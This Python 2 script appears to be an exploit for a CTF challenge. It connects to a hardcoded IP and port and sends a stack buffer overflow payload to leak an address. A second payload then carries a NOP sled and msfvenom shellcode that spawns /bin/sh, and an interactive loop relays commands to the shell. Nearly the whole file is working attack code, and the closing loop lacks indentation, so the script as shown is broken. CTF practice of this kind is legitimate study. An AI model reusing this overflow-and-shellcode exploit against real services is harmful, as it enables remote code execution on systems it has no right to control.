from socket import *
from struct import *
import time
#####################################
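def until(s, string):
    """Read from *s* one byte at a time until *string* has been received.

    s:      a connected socket (anything exposing ``recv(n)``).
    string: the delimiter to wait for; it is included in the result.
    Returns everything received up to and including the first occurrence
    of *string*.
    Raises EOFError if the peer closes the connection before the delimiter
    arrives -- ``recv`` then returns an empty value, and the original loop
    would spin forever appending nothing.
    """
    # Start from an empty value of the delimiter's own type so the helper
    # behaves the same for str (this Python 2 script) and for bytes.
    data = string[:0]
    while string not in data:
        chunk = s.recv(1)
        if not chunk:
            raise EOFError("connection closed before %r was received" % (string,))
        data += chunk
    return data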
#####################################
def p(x):
    """Pack *x* as a little-endian unsigned 32-bit value."""
    return pack('<L', x)


def q(x):
    """Pack *x* as a little-endian unsigned 64-bit value."""
    return pack('<Q', x)


def up(x):
    """Unpack one little-endian unsigned 32-bit value (1-tuple, as struct.unpack)."""
    return unpack('<L', x)


def uq(x):
    """Unpack one little-endian unsigned 64-bit value (1-tuple, as struct.unpack)."""
    return unpack('<Q', x)
# Target endpoint for this CTF challenge and the single TCP connection every
# later send/recv in the script goes through.
host, port = '54.173.98.115', 1259
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, port))
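# msfvenom -p linux/x86/exec CMD=/bin/sh -b '\x00' -e x86/alpha_mixed
# Payload bytes produced by the msfvenom command above.  ``-b '\x00'`` keeps
# NUL out of the output, and with the alpha_mixed encoder every byte after the
# first seven (the decoder stub on the first line) is a printable alphanumeric.
# The original file opened the command line with C-style ``//``, which Python
# parses as floor-division and rejects with a SyntaxError; ``#`` is the fix.
shellcode = "\x89\xe6\xdb\xce\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59"
shellcode += "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
shellcode += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
shellcode += "\x75\x4a\x49\x71\x7a\x34\x4b\x61\x48\x4a\x39\x52\x72\x52"
shellcode += "\x46\x51\x78\x36\x4d\x72\x43\x4b\x39\x59\x77\x65\x38\x76"
shellcode += "\x4f\x70\x73\x42\x48\x53\x30\x31\x78\x74\x6f\x75\x32\x70"
shellcode += "\x69\x52\x4e\x4e\x69\x6b\x53\x73\x62\x6a\x48\x75\x58\x47"
shellcode += "\x70\x57\x70\x67\x70\x64\x6f\x75\x32\x70\x69\x62\x4e\x64"
shellcode += "\x6f\x54\x33\x70\x68\x35\x50\x71\x47\x42\x73\x4d\x59\x4d"
shellcode += "\x31\x4a\x6d\x6d\x50\x41\x41"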
payload = "A" * 128
payload += p(0x475a31a5)
payload += p(0x40501555)
payload += "B" * 12 # sfp
payload += p(0x0804851D)
sock.send(payload + "\n")
lib = until(sock, "\n")
lib = lib[6:]
lib = int(lib,16) + 200
print lib
print until(sock, "\n")
payload2 = "A" * 128
payload2 += p(0x475a31a5)
payload2 += p(0x40501555)
payload2 += "B" * 16 # sfp
payload2 += p(lib) # ret
payload2 += "\x90" * 100
payload2 += shellcode
payload2 += "C" * 30
print "lib : " + hex(lib)
sock.send(payload2 + "\n")
print sock.recv(1024)
print sock.recv(1024)
while True:
cmd = raw_input('$ ')
sock.send(cmd+"\n")
print sock.recv(1024)